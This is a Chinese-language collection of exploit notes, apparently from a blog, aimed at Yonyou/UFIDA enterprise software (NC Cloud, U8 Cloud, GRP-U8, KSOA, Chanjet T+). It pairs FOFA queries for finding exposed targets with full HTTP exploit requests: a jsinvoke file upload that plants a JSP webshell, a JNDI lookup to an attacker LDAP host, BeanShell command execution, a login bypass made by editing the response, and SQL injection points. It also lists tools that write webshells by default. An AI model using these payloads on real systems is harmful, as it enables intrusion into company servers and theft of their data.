用友
- 用友nccloud+yonbip-ExportErrorAction-任意文件读取
- 介绍
- U8C-Cloud-base64-sql注入
- nccloud/nc-IImageInterfaceService/IBapIOService-xxe漏洞复现
- ⽤友 U9Cloud 远程代码执⾏
- nc-cloud jsinvoke 任意⽂件上传 RCE
- LoggingConfigServlet反序列化漏洞
- U8-cloud前台反序列化漏洞
- ⽂件服务器认证绕过
- **uploadApk.do 任意文件上传**
- **移动管理系统**前台SQL注入
- U8 CRM 任意文件读取
- PayBillSQL 注⼊
- 用友时空 KSOA-sKeyvalue 参数SQL 注入
- TaskRequestServletsql 注⼊
- 时空KSOA
- ImageUpload 前台文件上传
- 信息泄露
- ProxySQL注入 XXE RCE
- SMSProxy SQL堆叠注入
- AppProxy 任意文件上传
- GRP-U8 R10
- UploadFileData任意文件上传
- M1server 反序列化命令执⾏
- U8-CRM
- 畅捷通 SQL注入
- 上传
- 畅捷通-TPlus App_Code net反序列化RCE
- 畅捷通 T+
- 畅捷通 T+CheckMutex SQL注入
- 畅捷通T+ Upload.aspx 任意文件上传 CNVD-2022-60632
- JNDI 注⼊漏洞 ActionHandlerServlet接口存在反序列化漏洞
- NC BeanShell 命令执行
- U8-OA 企业版test.jsp SQL注入
- 用友U9 PatchFile.asmx 任意文件上传漏洞
- 用友NC Cloud soapFormat. ajax接口存在XXE
- 用友NC Cloud 用友 YonBIP PMCloudDriveProjectStateServlet JNDI注入漏洞
- 用友GRP-U8 forgetPassword_old.jsp存在SQL注入漏洞(QVD-2023-31085)
- 用友 NC
- 用友 U8 OA
- 用友 GRP-U8
- CNVD-2021-30167 用友NC 命令执行漏洞
- 用友portal接口存在任意文件读取漏洞
- 🔪畅捷通T+ Ufida.T.DI.UIP.RRA.RRATableController存在反序列化漏洞
- 畅捷通任意文件读取漏洞
- 畅捷通T+前台远程命令执行漏洞
- 用友畅捷通TPlus任意文件上传漏洞
- 畅捷通TPlus AjaxPro反序列化命令执行漏洞
- 畅捷通TPlus AjaxPro SQL注入致使远程命令执行漏洞
用友nccloud+yonbip-ExportErrorAction-任意文件读取
用友nccloud+yonbip-ExportErrorAction-任意文件读取
app=“用友-NC-Cloud”
ExportErrorAction接口
(1).用友NC&反序列化接口----------------------------------fofa:title=“YONYOU NC”
(2).用友GRP--------------------------------------------fofa:app=“yonyou-GRP-U8”
(3).用友NCCloud----------------------------------------fofa:body=“nccloud”
(4).用友tplus------------------------------------------fofa:app=“畅捷通-TPlus”
(5).用友U8C--------------------------------------------fofa:app=“用友-U8-Cloud”
(6).用友ufida------------------------------------------fofa:body=“ufida.ico”
yongyou_chajet_RCE (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)
yongyou_NC_FileReceiveServlet-RCE 反序列化rce (默认写入冰蝎4.0.3aes)
yongyou_NC_bsh.servlet.BshServlet_RCE (可直接执行系统命令)
yongyou_NC_NCFindWeb 目录遍历漏洞 (可查看是否存在历史遗留webshell)
yongyou_GRP_UploadFileData-RCE(默认写入冰蝎4.0.3aes)
yongyou_KSOA_imageUpload-RCE (默认写入冰蝎4.0.3aes)
用友OA
[+]用友时空KSOA PayBill SQL注入漏洞
[+]用友-时空KSOA 用友时空KSOA文件上传漏洞
[+]用友GRP-U8存在信息泄露
[+]用友时空 KSOATaskRequestServlet sql注入漏洞
[+]用友时空 KSOA servletimagefield 文件 sKeyvalue 参数SQL 注入
Yongyou_BshServlet_DatabaseDecode漏洞
YongYou_ERP_NC_DirTraversal漏洞
YongYou_U8_Rce_Sqlinjection漏洞
Yongyon_U8_getSessionList漏洞
YongYou_NC_Uapws_XXE漏洞
YongYou_U8_Sqlinjection漏洞
Yongyon_EF_DirTraversal漏洞
YongYou_BshServlet_Rce漏洞
介绍
UFIDA是中国的一家知名企业软件公司,全称为用友软件股份有限公司(Yonyou Software Co., Ltd.)。
该公司成立于1988年,总部位于北京,是中国领先的企业管理软件和云服务提供商之一。
UFIDA主要专注于开发和提供企业级软件解决方案,
包括财务管理、人力资源管理、采购管理、销售管理、供应链管理、生产制造管理等。它的产品被广泛应用于各种行业,
如制造业、服务业、金融业、医疗保健和公共事业等。
UFIDA致力于帮助企业提高管理效率、优化业务流程,并提供数据分析和决策支持工具。
其软件产品具备灵活性、可定制性和扩展性,能够满足不同企业规模和需求的管理需求。
作为一家在中国市场拥有广泛影响力的企业软件公司,UFIDA在国内外都有着大量的客户和合作伙伴。
除了软件产品,它也提供云服务、咨询、培训和技术支持等增值服务,以满足客户全面的业务需求。
飞企互联和用友软件股份有限公司(Yonyou Software Co., Ltd.)之间存在一定的关系。
根据公开信息,飞企互联于2018年12月推出了名为“UFLY”的人力资源管理(HRM)SaaS平台。
这个平台是基于用友软件的企业应用云平台“UPUP”(用友云平台)构建的,采用用友云平台的架构和技术,基于云计算、大数据、移动互联网等先进技术,提供覆盖人事、薪酬、绩效、招聘等多种功能的HRM解决方案。
因此从这个角度来看,飞企互联和用友软件可以被看作是合作关系,
用友软件提供了底层的技术支持和平台,而飞企互联则在此基础上进行了二次开发和应用,将其打造成适合不同客户需求的HRM产品。
U8C-Cloud-base64-sql注入
https://mp.weixin.qq.com/s/pr2ph5ygoeDAFVugGlbH1w
用友-U8-Cloud-base64接口处存在SQL注入漏洞,未授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户数据,造成用户信息泄露。
app=“用友-U8-Cloud”
GET /u8cloud/api/file/upload/base64 HTTP/1.1
Host: {
{
Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
system: -1*
Content-Length: 2
nccloud/nc-IImageInterfaceService/IBapIOService-xxe漏洞复现
https://mp.weixin.qq.com/s/2KBVvjPHDnvGAx6ixLUIYA
app=“用友-NC-Cloud”
body=“UClient.dmg”
python3 main.py -f url.txt -p yongyou-nccloud-IImageInterfaceService-xxe
python3 main.py -f url.txt -p yongyou-nc-IBapIOService-xxe
1、限制IImageInterfaceService和IBapIOService接口的访问
2、升级用友NC至最新版本
3、官网下载最新安全补丁:https://www.yonyou.com/
⽤友 U9Cloud 远程代码执⾏
影响版本:version<=202206(最新版) poc 暂⽆。
nc-cloud jsinvoke 任意⽂件上传 RCE
https://mp.weixin.qq.com/s/OO6GIKWm9ld05Vc2WQhkRg
web.body=“uap/rbac”
app=“用友-NC-Cloud”
用友NC Cloud大型企业数字化平台,深度应用新一代数字智能技术,完全基于云原生架构,打造开放、互联、融合、智能的一体化云平台,聚焦数智化管理、数智化经营、数智化商业等三大企业数智化转型战略方向,提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解决方案,帮助大型企业全面落地数智化。
用友NC及NC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器。
用友NC及NC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器。
影响范围
NC63、NC633、NC65、NC Cloud1903、NC Cloud1909、NC Cloud2005、NC Cloud2105、NC Cloud2111、YonBIP高级版2207
NC63、NC633、NC65
NC Cloud1903、NC Cloud1909
NC Cloud2005、NC Cloud2105、NC Cloud2111
YonBIP高级版2207
POST /uapjs/jsinvoke?action=invoke HTTP/1.1
Host: XXXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: cookiets=1689835770151; JSESSIONID=2BEFF983D118B58B579F45C703152075.server
Upgrade-Insecure-Requests: 1
If-Modified-Since: Mon, 11 May 2020 15:41:36 GMT
If-None-Match: W/"1571-1589211696000"
Content-Type: application/x-www-form-urlencoded
Content-Length: 178
{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["12311","webapps/nc_web/123.jsp"]}
{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://vps:port/TomcatBypass/TomcatEcho')}","webapps/nc_web/222.jsp"]}
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: 127.0.0.1:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cookiets=168170496; JSESSIONID=33A343770FF.server
If-None-Match: W/"1571-1589211696000"
If-Modified-Since: Mon, 11 May 2020 15:41:36 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 249
{
"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/404.jsp"]}
POST /404.jsp?error=bsh.Interpreter HTTP/1.1
Host: 127.0.0.1:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cookiets=1681785232226; JSESSIONID=334D3ED07A343770FF.server
If-None-Match: W/"1571-1589211696000"
If-Modified-Since: Mon, 11 May 2020 15:41:36 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 104
cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("ping 8.8.8.8").getInputStream())
cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())
"net user"
LoggingConfigServlet反序列化漏洞
所有版本存在
U8-cloud前台反序列化漏洞
01 漏洞概况
用友U8 cloud是用友公司推出的一款云端企业管理软件。它基于云计算和大数据技术,旨在帮助企业实现数字化转型和智能化管理。
近日,微步漏洞团队通过“X漏洞奖励计划”获取到用友U8 cloud前台反序列化漏洞情报,攻击者可利用该漏洞执行恶意代码,获取服务器权限。经过分析和研判,该漏洞利用难度低,建议尽快修复。
04 修复方案
1、官方修复方案:
官方已发布修复方案,受影响的用户建议联系官方获取安全补丁。
https://security.yonyou.com/#/patchInfo?foreignKey=7bd5b43e2c984a618b2b1d3f288110ae
2、临时修复方案:
1.通过ACL网络策略限制访问来源;
2.使用防护类设备对相关资产进行防护。
06 时间线
2023.08.31 厂商发布补丁
2023.09.18 微步发布报告
⽂件服务器认证绕过
资产搜索:
app="⽤友-NC-Cloud"或者是 app="⽤友-NC-Cloud"&&server=="Apache-Coyote/1.1"
POST 数据包修改返回包 false 改成 ture 就可以绕过登陆
资产搜索:
app="某友-NC-Cloud" 或者是app="某友-NC-Cloud" && server=="Apache-Coyote/1.1"
POST数据包修改返回包false改成ture就可以绕过登陆
然后抓包
POST /report/reportServlet?action=8 HTTP/1.1
Host: xxxx
Content-Length: 145
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://xxx/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://xxxx/report/reportJsp/showReport.jsp?raq=%2FJourTemp2.raq&reportParamsId=100xxx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=D207AE96056400942620F09D34B8CDF3
Connection: close
year=*&userName=*&startDate=*&endDate=*&dutyRule=*&resultPage=%2FreportJsp%2FshowRepo
HTTP / 1.1 200 OK
Server:Apache-Coyote/1.1
Date:Thu,10Aug202320:38:25GMT
Connection:close
Content-Length:17
{"login":"false"}
uploadApk.do 任意文件上传
app="用友-移动系统管理"
访问路径:/maupload/apk/a.jsp
POST /maportal/appmanager/uploadApk.do?pk_obj=0001A1100000000H66QB HTTP/1.1
Host:
Content-Length: 198
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.server
Connection: close
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3
Content-Disposition: form-data; name="downloadpath"; filename="a.jsp"
Content-Type: application/msword
hello
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--
移动管理系统前台SQL注入
0x01漏洞描述
用友移动系统管理存在前台SQL注入漏洞,攻击者可通过此漏洞获取敏感信息,从而为下一步攻击做准备。
0x02漏洞复现
1、fofa
"移动系统管理"
3、直接跑目录
存在未授权访问
访问发现/maportal/存在未授权访问
存在sql注入点1(appname参数存在隐患),随便输入1,直接点击查询数据包如下
POST /maportal/appmanager/init HTTP/1.1
Host: 127.0.0.1
Content-Length: 40
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://127.0.0.1:5080
Referer: http://127.0.0.1/maportal/html/paramsetup/paramsetup.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=D298606CA51929CE86EA83C32FA39139.server
Connection: close
appname=1&sys_type=&loginmode=&joinmode=
存在sql注入点2(pk_obj参数存在隐患),点击新增,直接抓包数据包如下:
POST /maportal/appmanager/save HTTP/1.1
Host: 127.0.0.1:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 202
Origin: http://127.0.0.1:8989
Connection: close
Referer: http://127.0.0.1:8989/maportal/html/paramsetup/addParamsetup.html?pk_obj=null
pk_obj=1
该产品除了两处sql注入外,还存在任意文件读取和任意文件上传,详情如下:
https://wiki.freebuf.com/front/societyFront?invitation_code=2f34044b&society_id=107&source_data=2
0x03修复建议
1、对相关页面进行严格的访问权限的控制以及对访问角色进行权限检查!
2、过来用户输入的特殊字符。
https:
最低0.47元/天 解锁文章
552
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
